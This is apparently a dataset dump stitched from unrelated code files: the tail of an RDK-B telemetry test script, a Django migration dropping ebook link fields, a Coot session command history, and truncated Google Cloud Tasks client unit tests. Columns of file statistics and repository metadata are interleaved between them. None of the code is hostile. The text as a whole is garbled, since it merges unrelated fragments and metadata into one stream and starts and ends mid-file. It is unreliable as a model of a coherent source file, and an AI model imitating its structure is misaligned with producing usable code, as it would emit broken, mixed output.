#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 3: Get the current Telemetry version in the DUT after Telemetry Enable";
print "EXPECTED RESULT 3: Should get the current Telemetry version in the DUT"
print "ACTUAL RESULT 3: ",telver;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "telemetry was disabled and failed on enabling";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 1: Get the Telemetry Enable status";
print "EXPECTED RESULT 1: Should get the Telemetry Enable status";
print "ACTUAL RESULT 1: Telemetry Enable status is:",default
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
if revertflag ==1:
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Set');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.Enable");
tdkTestObj.addParameter("ParamValue",default);
tdkTestObj.addParameter("Type","bool");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 9:Revert the telemetry enable status to previous";
print "EXPECTED RESULT 9: Should revert the telemetry enable status to previous";
print "ACTUAL RESULT 9: Revertion was successful";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Get');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.Version")
expectedresult= "SUCCESS";
#Execute testcase on DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult and int(details) == 1:
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 10:Check if the Telemetry version is 1.0 after disabling Telemetry";
print "EXPECTED RESULT 10: Telemetry version should be 1.0 after disabling Telemetry";
print "ACTUAL RESULT 10:",details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 10:Check if the Telemetry version is 1.0 after disabling Telemetry";
print "EXPECTED RESULT 10: Telemetry version should be 1.0 after disabling Telemetry";
print "ACTUAL RESULT 10: ",details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 9:Revert the telemetry enable status to previous";
print "EXPECTED RESULT 9: Should revert the telemetry enable status to previous";
print "ACTUAL RESULT 9: Revertion failed";
print "[TEST EXECUTION RESULT] : FAILURE";
obj1.unloadModule("tdkbtr181");
obj.unloadModule("sysutil");
else:
print "Failed to load module";
obj.setLoadModuleStatus("FAILURE");
obj1.setLoadModuleStatus("FAILURE");
| 52.48468
| 125
| 0.625252
| 1,983
| 18,842
| 5.872416
| 0.140696
| 0.030915
| 0.02061
| 0.024045
| 0.745041
| 0.733705
| 0.720052
| 0.703392
| 0.703392
| 0.682439
| 0
| 0.017012
| 0.279323
| 18,842
| 358
| 126
| 52.631285
| 0.840563
| 0.109012
| 0
| 0.755556
| 0
| 0
| 0.365998
| 0.050475
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.013333
| null | null | 0.377778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 2af57b653261588b726a18c3bfb5728aee1d403c
| 85
| py
| Python
| mainapp/views/feeds/__init__.py
| CatoTH/opensourceris
| 3b4b5e4b027a96fd08147fc57b53f078a44a00a7
| ["MIT"] | 1
| 2022-02-17T13:46:03.000Z
| 2022-02-17T13:46:03.000Z
| mainapp/views/feeds/__init__.py
| CatoTH/opensourceris
| 3b4b5e4b027a96fd08147fc57b53f078a44a00a7
| ["MIT"] | 13
| 2022-02-11T14:45:36.000Z
| 2022-02-22T19:54:03.000Z
| mainapp/views/feeds/__init__.py
| CatoTH/opensourceris
| 3b4b5e4b027a96fd08147fc57b53f078a44a00a7
| ["MIT"] | 1
| 2022-02-17T13:44:17.000Z
| 2022-02-17T13:44:17.000Z
|
from .latest_papers import * # noqa F401
from .search_results import * # noqa F401
| 28.333333
| 42
| 0.741176
| 12
| 85
| 5.083333
| 0.666667
| 0.327869
| 0.459016
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 0.188235
| 85
| 2
| 43
| 42.5
| 0.797101
| 0.223529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 7
| 2d5753edc1ae0b301e3006815b0a1ec6d47d7b24
| 1,511
| py
| Python
| great_international/migrations/0086_auto_20190917_0752.py
| uktrade/directory-cms
| 8c8d13ce29ea74ddce7a40f3dd29c8847145d549
| ["MIT"] | 6
| 2018-03-20T11:19:07.000Z
| 2021-10-05T07:53:11.000Z
| great_international/migrations/0086_auto_20190917_0752.py
| uktrade/directory-cms
| 8c8d13ce29ea74ddce7a40f3dd29c8847145d549
| ["MIT"] | 802
| 2018-02-05T14:16:13.000Z
| 2022-02-10T10:59:21.000Z
| great_international/migrations/0086_auto_20190917_0752.py
| uktrade/directory-cms
| 8c8d13ce29ea74ddce7a40f3dd29c8847145d549
| ["MIT"] | 6
| 2019-01-22T13:19:37.000Z
| 2019-07-01T10:35:26.000Z
|
# Generated by Django 2.2.4 on 2019-09-17 07:52
from django.db import migrations
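# Drops the ebook_section_pdf_link field and its per-language variants
# (ar, de, en_gb, es, fr, ja, pt, zh_hans) from aboutukwhychoosetheukpage.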
class Migration(migrations.Migration):
dependencies = [
('great_international', '0085_auto_20190916_1443'),
]
operations = [
migrations.RemoveField(
model_name='aboutukwhychoosetheukpage',
name='ebook_section_pdf_link',
),
migrations.RemoveField(
model_name='aboutukwhychoosetheukpage',
name='ebook_section_pdf_link_ar',
),
migrations.RemoveField(
model_name='aboutukwhychoosetheukpage',
name='ebook_section_pdf_link_de',
),
migrations.RemoveField(
model_name='aboutukwhychoosetheukpage',
name='ebook_section_pdf_link_en_gb',
),
migrations.RemoveField(
model_name='aboutukwhychoosetheukpage',
name='ebook_section_pdf_link_es',
),
migrations.RemoveField(
model_name='aboutukwhychoosetheukpage',
name='ebook_section_pdf_link_fr',
),
migrations.RemoveField(
model_name='aboutukwhychoosetheukpage',
name='ebook_section_pdf_link_ja',
),
migrations.RemoveField(
model_name='aboutukwhychoosetheukpage',
name='ebook_section_pdf_link_pt',
),
migrations.RemoveField(
model_name='aboutukwhychoosetheukpage',
name='ebook_section_pdf_link_zh_hans',
),
]
| 30.22
| 59
| 0.614825
| 129
| 1,511
| 6.813953
| 0.333333
| 0.215017
| 0.266212
| 0.307167
| 0.798635
| 0.798635
| 0.798635
| 0.798635
| 0.798635
| 0.798635
| 0
| 0.02919
| 0.297154
| 1,511
| 49
| 60
| 30.836735
| 0.798493
| 0.029782
| 0
| 0.627907
| 1
| 0
| 0.339481
| 0.326503
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.023256
| 0
| 0.093023
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 9328a19acee4b872a09451f40c8532237d58b7ad
| 2,935
| py
| Python
| data/0-coot-history.py
| cz-zhao-lab-ibp/edpdb
| 5b0654776409fff26ca1dbd09a5f297c71dc5984
| ["Xnet", "X11"] | 1
| 2021-06-24T03:33:56.000Z
| 2021-06-24T03:33:56.000Z
| data/0-coot-history.py
| cz-zhao-lab-ibp/edpdb
| 5b0654776409fff26ca1dbd09a5f297c71dc5984
| ["Xnet", "X11"] | null | null | null
| data/0-coot-history.py
| cz-zhao-lab-ibp/edpdb
| 5b0654776409fff26ca1dbd09a5f297c71dc5984
| ["Xnet", "X11"] | null | null | null
|
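# Recorded Coot session history: each line replays a state or GUI call as
# Coot logged it. Lines beginning with ';; #' appear to be commands echoed
# from the Scheme side of the history rather than Python calls.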
filter_fileselection_filenames_state ()
get_active_map_drag_flag ()
use_graphics_interface_state ()
set_display_intro_string ("Good Morning Zhangc, Welcome to Coot.")
set_filter_fileselection_filenames (0)
unset_sticky_sort_by_date ()
set_colour_map_rotation_on_read_pdb (164963936.00)
set_colour_map_rotation_on_read_pdb_c_only_flag (1)
set_density_size (164963936.00)
set_swap_difference_map_colours (0)
set_active_map_drag_flag (1)
set_idle_function_rotate_angle (164963936.00)
filter_fileselection_filenames_state ()
get_active_map_drag_flag ()
use_graphics_interface_state ()
set_display_intro_string ("Good morning . Welcome to Coot")
set_display_lists_for_maps (0)
set_filter_fileselection_filenames (0)
unset_sticky_sort_by_date ()
set_colour_map_rotation_on_read_pdb (15334232.00)
set_colour_map_rotation_on_read_pdb_c_only_flag (1)
set_density_size (1028.00)
set_swap_difference_map_colours (0)
set_active_map_drag_flag (1)
set_idle_function_rotate_angle (1028.00)
filter_fileselection_filenames_state ()
get_active_map_drag_flag ()
use_graphics_interface_state ()
;; # DIRECT SCHEME ((command-in-path? *probe-command*))
set_filter_fileselection_filenames (0)
unset_sticky_sort_by_date ()
set_colour_map_rotation_on_read_pdb (9823860.00)
set_colour_map_rotation_on_read_pdb_c_only_flag (1)
set_density_size (10.00)
set_idle_function_rotate_angle (1065353216.00)
filter_fileselection_filenames_state ()
handle_read_draw_molecule_with_recentre ("/home/cai/eta/edpdb/data", 1)
set_filter_fileselection_filenames (0)
unset_sticky_sort_by_date ()
set_colour_map_rotation_on_read_pdb (9823860.00)
set_colour_map_rotation_on_read_pdb_c_only_flag (1)
set_density_size (10.00)
set_idle_function_rotate_angle (1065353216.00)
filter_fileselection_filenames_state ()
filter_fileselection_filenames_state ()
set_filter_fileselection_filenames (0)
unset_sticky_sort_by_date ()
set_colour_map_rotation_on_read_pdb (9823860.00)
set_colour_map_rotation_on_read_pdb_c_only_flag (1)
set_density_size (10.00)
set_idle_function_rotate_angle (1065353216.00)
;; # DIRECT SCHEME ((command-in-path? *probe-command*))
set_filter_fileselection_filenames (0)
unset_sticky_sort_by_date ()
set_colour_map_rotation_on_read_pdb (9823860.00)
set_colour_map_rotation_on_read_pdb_c_only_flag (1)
set_density_size (10.00)
set_idle_function_rotate_angle (1065353216.00)
;; # DIRECT SCHEME ((smiles-gui))
stereo_mode_state ()
stereo_mode_state ()
stereo_mode_state ()
stereo_mode_state ()
stereo_mode_state ()
;; # DIRECT SCHEME ((command-in-path? *probe-command*))
set_filter_fileselection_filenames (0)
unset_sticky_sort_by_date ()
set_colour_map_rotation_on_read_pdb (9823860.00)
set_colour_map_rotation_on_read_pdb_c_only_flag (1)
set_density_size (10.00)
set_idle_function_rotate_angle (1065353216.00)
;; # DIRECT SCHEME ((command-in-path? *probe-command*))
coot_checked_exit (0)
;; # DIRECT SCHEME ((clear-backups-maybe))
stereo_mode_state ()
save_state ()
| 38.116883
| 71
| 0.853492
| 467
| 2,935
| 4.762313
| 0.173448
| 0.056655
| 0.07554
| 0.125899
| 0.881745
| 0.881745
| 0.881745
| 0.881745
| 0.881745
| 0.881745
| 0
| 0.073091
| 0.063032
| 2,935
| 76
| 72
| 38.618421
| 0.735636
| 0.091993
| 0
| 0.842105
| 0
| 0
| 0.034236
| 0.009029
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 933dba7001d06c35acd08924e702dc9955e12fcb
| 156,631
| py
| Python
| tests/unit/gapic/tasks_v2beta3/test_cloud_tasks.py
| colincadams/python-tasks
| e86a80b2623e812775b58950af2f858128b4bb98
| ["Apache-2.0"] | null | null | null
| tests/unit/gapic/tasks_v2beta3/test_cloud_tasks.py
| colincadams/python-tasks
| e86a80b2623e812775b58950af2f858128b4bb98
| ["Apache-2.0"] | null | null | null
| tests/unit/gapic/tasks_v2beta3/test_cloud_tasks.py
| colincadams/python-tasks
| e86a80b2623e812775b58950af2f858128b4bb98
| ["Apache-2.0"] | null | null | null
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google import auth
from google.api_core import client_options
from google.api_core import exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.auth import credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.tasks_v2beta3.services.cloud_tasks import CloudTasksAsyncClient
from google.cloud.tasks_v2beta3.services.cloud_tasks import CloudTasksClient
from google.cloud.tasks_v2beta3.services.cloud_tasks import pagers
from google.cloud.tasks_v2beta3.services.cloud_tasks import transports
from google.cloud.tasks_v2beta3.types import cloudtasks
from google.cloud.tasks_v2beta3.types import queue
from google.cloud.tasks_v2beta3.types import queue as gct_queue
from google.cloud.tasks_v2beta3.types import target
from google.cloud.tasks_v2beta3.types import task
from google.cloud.tasks_v2beta3.types import task as gct_task
from google.iam.v1 import iam_policy_pb2 as iam_policy # type: ignore
from google.iam.v1 import options_pb2 as options # type: ignore
from google.iam.v1 import policy_pb2 as policy # type: ignore
from google.oauth2 import service_account
from google.protobuf import any_pb2 as any # type: ignore
from google.protobuf import duration_pb2 as duration # type: ignore
from google.protobuf import field_mask_pb2 as field_mask # type: ignore
from google.protobuf import timestamp_pb2 as timestamp # type: ignore
from google.rpc import status_pb2 as status # type: ignore
from google.type import expr_pb2 as expr # type: ignore
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If the default endpoint is localhost, the default mTLS endpoint would be
# the same. This helper swaps in a non-localhost endpoint so the tests below
# can observe a distinct mTLS endpoint.
def modify_default_endpoint(client):
return (
"foo.googleapis.com"
if ("localhost" in client.DEFAULT_ENDPOINT)
else client.DEFAULT_ENDPOINT
)
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert CloudTasksClient._get_default_mtls_endpoint(None) is None
assert (
CloudTasksClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
)
assert (
CloudTasksClient._get_default_mtls_endpoint(api_mtls_endpoint)
== api_mtls_endpoint
)
assert (
CloudTasksClient._get_default_mtls_endpoint(sandbox_endpoint)
== sandbox_mtls_endpoint
)
assert (
CloudTasksClient._get_default_mtls_endpoint(sandbox_mtls_endpoint)
== sandbox_mtls_endpoint
)
assert CloudTasksClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
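# The assertions above pin down the endpoint convention under test:
# "<name>.googleapis.com" becomes "<name>.mtls.googleapis.com",
# "<name>.sandbox.googleapis.com" becomes "<name>.mtls.sandbox.googleapis.com",
# an endpoint that is already an mTLS endpoint is returned unchanged, and
# non-googleapis hosts pass through untouched. A minimal sketch of that
# mapping, for illustration only (the client's real implementation may differ):
def _example_mtls_endpoint(api_endpoint):
    if api_endpoint is None:
        return None
    if ".mtls." in api_endpoint:  # already an mTLS endpoint; idempotent
        return api_endpoint
    for suffix in ("sandbox.googleapis.com", "googleapis.com"):
        if api_endpoint.endswith("." + suffix):
            name = api_endpoint[: -(len(suffix) + 1)]
            return "{}.mtls.{}".format(name, suffix)
    return api_endpoint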
@pytest.mark.parametrize("client_class", [CloudTasksClient, CloudTasksAsyncClient])
def test_cloud_tasks_client_from_service_account_file(client_class):
creds = credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_file"
) as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client._transport._credentials == creds
client = client_class.from_service_account_json("dummy/file/path.json")
assert client._transport._credentials == creds
assert client._transport._host == "cloudtasks.googleapis.com:443"
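# In application code the same factory is used with a real key file; the
# path below is a placeholder, not a real credential:
#
#   client = CloudTasksClient.from_service_account_file(
#       "/path/to/service-account.json"
#   )
#
# from_service_account_json accepts the same file path, as exercised above.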
def test_cloud_tasks_client_get_transport_class():
transport = CloudTasksClient.get_transport_class()
assert transport == transports.CloudTasksGrpcTransport
transport = CloudTasksClient.get_transport_class("grpc")
assert transport == transports.CloudTasksGrpcTransport
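# Callers can likewise select the transport explicitly, either by name
# (as asserted above) or by passing a constructed transport instance:
#
#   client = CloudTasksClient(transport="grpc")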
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(CloudTasksClient, transports.CloudTasksGrpcTransport, "grpc"),
(
CloudTasksAsyncClient,
transports.CloudTasksGrpcAsyncIOTransport,
"grpc_asyncio",
),
],
)
@mock.patch.object(
CloudTasksClient, "DEFAULT_ENDPOINT", modify_default_endpoint(CloudTasksClient)
)
@mock.patch.object(
CloudTasksAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(CloudTasksAsyncClient),
)
def test_cloud_tasks_client_client_options(
client_class, transport_class, transport_name
):
# Check that if a transport instance is provided, we won't create a new one.
with mock.patch.object(CloudTasksClient, "get_transport_class") as gtc:
transport = transport_class(credentials=credentials.AnonymousCredentials())
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if the transport is provided as a string, we will create a new one.
with mock.patch.object(CloudTasksClient, "get_transport_class") as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
api_mtls_endpoint="squid.clam.whelk",
client_cert_source=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS": "never"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
api_mtls_endpoint=client.DEFAULT_ENDPOINT,
client_cert_source=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS": "always"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
api_mtls_endpoint=client.DEFAULT_MTLS_ENDPOINT,
client_cert_source=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided, GOOGLE_API_USE_MTLS is
# "auto", and client_cert_source is provided.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS": "auto"}):
options = client_options.ClientOptions(
client_cert_source=client_cert_source_callback
)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
api_mtls_endpoint=client.DEFAULT_MTLS_ENDPOINT,
client_cert_source=client_cert_source_callback,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided, GOOGLE_API_USE_MTLS is
# "auto", and default_client_cert_source is provided.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS": "auto"}):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
api_mtls_endpoint=client.DEFAULT_MTLS_ENDPOINT,
client_cert_source=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided, GOOGLE_API_USE_MTLS is
# "auto", but client_cert_source and default_client_cert_source are None.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS": "auto"}):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
api_mtls_endpoint=client.DEFAULT_ENDPOINT,
client_cert_source=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class()
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
api_mtls_endpoint=client.DEFAULT_ENDPOINT,
client_cert_source=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
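# Taken together, the cases above exercise this endpoint-selection matrix:
#   explicit api_endpoint in ClientOptions -> that endpoint, verbatim
#   GOOGLE_API_USE_MTLS="never"            -> DEFAULT_ENDPOINT
#   GOOGLE_API_USE_MTLS="always"           -> DEFAULT_MTLS_ENDPOINT
#   GOOGLE_API_USE_MTLS="auto"             -> DEFAULT_MTLS_ENDPOINT when a
#       client certificate source is available, DEFAULT_ENDPOINT otherwise
#   any other value                        -> MutualTLSChannelError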
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(CloudTasksClient, transports.CloudTasksGrpcTransport, "grpc"),
(
CloudTasksAsyncClient,
transports.CloudTasksGrpcAsyncIOTransport,
"grpc_asyncio",
),
],
)
def test_cloud_tasks_client_client_options_scopes(
client_class, transport_class, transport_name
):
# Check the case scopes are provided.
options = client_options.ClientOptions(scopes=["1", "2"],)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
api_mtls_endpoint=client.DEFAULT_ENDPOINT,
client_cert_source=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(CloudTasksClient, transports.CloudTasksGrpcTransport, "grpc"),
(
CloudTasksAsyncClient,
transports.CloudTasksGrpcAsyncIOTransport,
"grpc_asyncio",
),
],
)
def test_cloud_tasks_client_client_options_credentials_file(
client_class, transport_class, transport_name
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
api_mtls_endpoint=client.DEFAULT_ENDPOINT,
client_cert_source=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_cloud_tasks_client_client_options_from_dict():
with mock.patch(
"google.cloud.tasks_v2beta3.services.cloud_tasks.transports.CloudTasksGrpcTransport.__init__"
) as grpc_transport:
grpc_transport.return_value = None
client = CloudTasksClient(client_options={"api_endpoint": "squid.clam.whelk"})
grpc_transport.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
api_mtls_endpoint="squid.clam.whelk",
client_cert_source=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
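# client_options may be given as a ClientOptions instance or, as above, a
# plain dict with the same keys; a usage sketch (the endpoint is the test's
# placeholder, not a real host):
#
#   client = CloudTasksClient(
#       client_options={"api_endpoint": "squid.clam.whelk"}
#   )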
def test_list_queues(
transport: str = "grpc", request_type=cloudtasks.ListQueuesRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_queues), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListQueuesResponse(
next_page_token="next_page_token_value",
)
response = client.list_queues(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ListQueuesRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListQueuesPager)
assert response.next_page_token == "next_page_token_value"
def test_list_queues_from_dict():
test_list_queues(request_type=dict)
@pytest.mark.asyncio
async def test_list_queues_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.ListQueuesRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_queues), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListQueuesResponse(next_page_token="next_page_token_value",)
)
response = await client.list_queues(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListQueuesAsyncPager)
assert response.next_page_token == "next_page_token_value"
def test_list_queues_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ListQueuesRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_queues), "__call__") as call:
call.return_value = cloudtasks.ListQueuesResponse()
client.list_queues(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_queues_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ListQueuesRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_queues), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListQueuesResponse()
)
await client.list_queues(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_list_queues_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_queues), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListQueuesResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_queues(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == "parent_value"
def test_list_queues_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_queues(
cloudtasks.ListQueuesRequest(), parent="parent_value",
)
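# The two calling conventions are mutually exclusive: pass either a request
# object or flattened keyword fields, never both. Sketch (the parent value
# is a placeholder):
#
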